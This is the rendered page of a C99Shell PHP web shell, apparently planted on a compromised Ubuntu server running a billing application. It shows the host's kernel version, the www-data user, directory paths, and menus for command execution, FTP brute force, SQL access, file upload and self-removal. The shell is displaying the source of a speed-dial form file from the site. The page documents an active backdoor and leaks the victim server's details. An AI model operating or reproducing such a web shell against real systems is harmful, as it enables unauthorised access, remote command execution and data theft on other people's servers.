!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/billing/system/application/views/client/   drwxr-xr-x
Free 13.4 GB of 57.97 GB (23.11%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     speed_dial_form.php (2.17 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<script>

function addBalance(amount)
{
document.getElementById("amount").value = amount;

}



</script>



<table width="550" border="0" cellspacing="0" cellpadding="0" class="tableBorder">

  <tr>
    <td>
<form id="formID"  method="post" action="<?=site_url('client/addSpeedDial')?>">
<input type='hidden' name='id_client' id='id_client' value='<?= $id_client?>' >
<input type='hidden' name='clienttype' id='clienttype' value='<?= $clienttype?>' >

<table width="100%" border="0" align="center" cellpadding="0" cellspacing="0" style="border-bottom:1px solid #99BBE8; border-top:1px solid #99BBE8">

  <tr>
    <td colspan="2" class="mainTableTitle" style="padding-top:0px;">

      <span>&nbsp;&nbsp;&raquo;</span> <?=TITLE064?>

    </td>
  </tr>


<tr>
    <td class='formLabelRigit' width='30%' style='padding-top:10px;padding-bottom:3px;padding-left:5px;'> Name :  </td>
    <td class='formLabelLeft' width='70%' style='padding-top:10px;padding-bottom:3px;padding-left:5px;'><input type='text' class='formInput' name='name' id='name' style='width:150px;' value='<?= $name?>' /></td>
</tr>


<tr>
    <td class='formLabelRigit' width='30%' style='padding-top:10px;padding-bottom:3px;padding-left:5px;'> Phone Number :  </td>
    <td class='formLabelLeft' width='70%' style='padding-top:10px;padding-bottom:3px;padding-left:5px;'><input type='text' class='formInput' name='phone' id='phone' style='width:150px;' value='<?= $phone?>' /></td>
</tr>

<tr>
    <td class='formLabelRigit' style="padding-top:3px;padding-bottom:3px;"> Speed Dial : </td>
    <td class='formLabelLeft' style="padding-top:3px;padding-bottom:3px;padding-left:5px;">
        <select name="speeddial" id="speeddial" class="selectFrom">
        <option value="1">1#</option>
        <option value="2">2#</option>
        <option value="3">3#</option>
        <option value="4">4#</option>
        <option value="5">5#</option>
        <option value="6">6#</option>
        <option value="7">7#</option>
        <option value="8">8#</option>
        <option value="9">9#</option>
        </select>
    </td>
</tr>

  <tr>
    <td colspan="2" align="center" style="padding:15px;"><input type="submit" name="submit" value="Add Speed Dial" class="input-submit" /></td>
  </tr>



</table>

</form>
    </td>
  </tr>
</table>




:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0063 ]--